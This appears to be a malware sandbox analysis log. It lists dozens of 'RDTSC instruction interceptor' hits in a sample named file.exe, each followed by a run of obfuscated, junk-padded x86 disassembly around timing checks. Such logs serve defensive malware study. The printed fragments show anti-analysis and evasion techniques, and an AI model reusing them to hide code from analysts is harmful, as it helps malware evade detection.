Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 116AA6C second address: 116AA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FB8DCE20296h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 116F6CD second address: 116F6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11722DB second address: 11722DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11722DF second address: 1172302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCDE9E47h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1173F4A second address: 1173F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FB8DCE20296h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1175300 second address: 117531B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11746A6 second address: 11746AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 117726A second address: 1177274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB8DCDE9E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1176496 second address: 117649A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11792A8 second address: 11792AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 117857C second address: 1178582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11792AC second address: 117931A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8DCDE9E38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB8DCDE9E48h 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D359Eh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FB8DCDE9E38h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dword ptr [ebp+12486023h], ecx 0x00000039 push 00000000h 0x0000003b and edi, 058A6F38h 0x00000041 xchg eax, esi 0x00000042 push edi 0x00000043 push esi 0x00000044 push esi 0x00000045 pop esi 0x00000046 pop esi 0x00000047 pop edi 0x00000048 push eax 0x00000049 push esi 0x0000004a push eax 0x0000004b push edx 0x0000004c jp 00007FB8DCDE9E36h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1178582 second address: 117861D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8DCE2029Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FB8DCE20298h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov di, 62F5h 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 jmp 00007FB8DCE202A2h 0x0000003c mov eax, dword ptr [ebp+122D0391h] 0x00000042 mov dword ptr [ebp+12469C1Fh], ecx 0x00000048 push FFFFFFFFh 0x0000004a ja 00007FB8DCE202A1h 0x00000050 nop 0x00000051 jmp 00007FB8DCE2029Bh 0x00000056 push eax 0x00000057 jc 00007FB8DCE202B2h 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FB8DCE202A4h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 117945E second address: 1179467 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 117A61A second address: 117A620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11824AE second address: 11824BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCDE9E3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11825F1 second address: 11825FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB8DCE20296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1183637 second address: 11836DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB8DCDE9E48h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FB8DCDE9E38h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 and ebx, 54267E7Eh 0x0000002e mov dword ptr [ebp+122D3642h], ecx 0x00000034 push dword ptr fs:[00000000h] 0x0000003b mov di, 85BFh 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 mov edi, dword ptr [ebp+122D1819h] 0x0000004c mov eax, dword ptr [ebp+122D0BB5h] 0x00000052 push 00000000h 0x00000054 push ebx 0x00000055 call 00007FB8DCDE9E38h 0x0000005a pop ebx 0x0000005b mov dword ptr [esp+04h], ebx 0x0000005f add dword ptr [esp+04h], 00000016h 0x00000067 inc ebx 0x00000068 push ebx 0x00000069 ret 0x0000006a pop ebx 0x0000006b ret 0x0000006c push ebx 0x0000006d mov edi, ecx 0x0000006f pop ebx 0x00000070 mov ebx, dword ptr [ebp+122D2A36h] 0x00000076 push FFFFFFFFh 0x00000078 xor dword ptr [ebp+122D17EEh], esi 0x0000007e nop 0x0000007f push eax 0x00000080 push edx 0x00000081 push edi 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11825FB second address: 11825FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11836DC second address: 11836E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11825FF second address: 118261A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8DCE2029Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 118261A second address: 1182687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 sbb di, C2B0h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov edi, dword ptr [ebp+122D2A3Ch] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov eax, dword ptr [ebp+122D0299h] 0x00000027 mov ebx, 3F7A202Ch 0x0000002c push FFFFFFFFh 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FB8DCDE9E38h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b jmp 00007FB8DCDE9E45h 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1192DAB second address: 1192DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FB8DCE20296h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192DBD second address: 1192DC3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192DC3 second address: 1192DC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192DC8 second address: 1192DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192DCE second address: 1192DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192E42 second address: 1192E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192E46 second address: 1192E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192E54 second address: 1192E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FB8DCDE9E3Dh 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 jo 00007FB8DCDE9E36h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FB8DCDE9E47h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192E97 second address: 1192EB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007FB8DCE20296h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986A6 second address: 11986B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986B2 second address: 11986E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 jmp 00007FB8DCE202A3h 0x0000000e jmp 00007FB8DCE2029Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007FB8DCE20296h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986E4 second address: 11986E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119829E second address: 11982B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE202A1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11983FF second address: 1198409 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8DCDE9E3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B759 second address: 119B763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D157 second address: 116D15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D15C second address: 116D179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FB8DCE20296h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FB8DCE2029Ch 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D179 second address: 116D188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCDE9E3Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D7C6 second address: 116D7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D7CA second address: 116D801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8DCDE9E42h 0x00000008 jmp 00007FB8DCDE9E45h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D801 second address: 116D807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D807 second address: 116D83F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007FB8DCDE9E41h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB8DCDE9E3Ch 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E063 second address: 116E0B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE2029Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b xor dx, 9402h 0x00000010 mov edi, dword ptr [ebp+122D1ACAh] 0x00000016 push 0000001Eh 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FB8DCE20298h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov edi, dword ptr [ebp+12469C1Fh] 0x00000038 nop 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E3AF second address: 116E3B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E3B5 second address: 116E3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E3B9 second address: 116E3E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007FB8DCDE9E46h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB8DCDE9E3Ah 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E3E7 second address: 116E402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE2029Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E402 second address: 116E407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E407 second address: 116E40D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E40D second address: 116E411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E411 second address: 116E421 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E535 second address: 116E53A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E53A second address: 116E557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE2029Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E557 second address: 116E56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCDE9E42h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E56D second address: 114CE1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dx, cx 0x0000000c lea eax, dword ptr [ebp+12490F26h] 0x00000012 push eax 0x00000013 push eax 0x00000014 jmp 00007FB8DCE202A5h 0x00000019 pop eax 0x0000001a mov dword ptr [esp], eax 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FB8DCE20298h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 mov ecx, dword ptr [ebp+122D1C71h] 0x0000003d je 00007FB8DCE2029Ch 0x00000043 xor edx, dword ptr [ebp+122D37C1h] 0x00000049 call dword ptr [ebp+122D3106h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007FB8DCE202AAh 0x00000057 jmp 00007FB8DCE202A4h 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A34AD second address: 11A34BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E3Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A34BD second address: 11A34C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB8DCE20296h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A34C7 second address: 11A34CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A37A4 second address: 11A37AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A37AA second address: 11A37B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A37B4 second address: 11A37B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A37B8 second address: 11A37BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3A51 second address: 11A3A56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3D0B second address: 11A3D32 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8DCDE9E36h 0x00000008 jmp 00007FB8DCDE9E3Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FB8DCDE9E36h 0x00000017 jl 00007FB8DCDE9E36h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A98B6 second address: 11A98D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8DCE202A8h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A853C second address: 11A8552 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8DCDE9E40h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8974 second address: 11A8978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8AF5 second address: 11A8B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB8DCDE9E40h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8B0F second address: 11A8B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A91C2 second address: 11A91D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCDE9E40h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF162 second address: 11AF17C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF17C second address: 11AF183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE092 second address: 11AE0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE202A0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE45C second address: 11AE4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCDE9E47h 0x00000009 jmp 00007FB8DCDE9E41h 0x0000000e popad 0x0000000f je 00007FB8DCDE9E38h 0x00000015 jmp 00007FB8DCDE9E3Bh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE4A2 second address: 11AE4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB8DCE20296h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE4AD second address: 11AE4B9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8DCDE9E3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE8AC second address: 11AE8B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AEE2D second address: 11AEE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB8DCDE9E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AEE37 second address: 11AEE41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
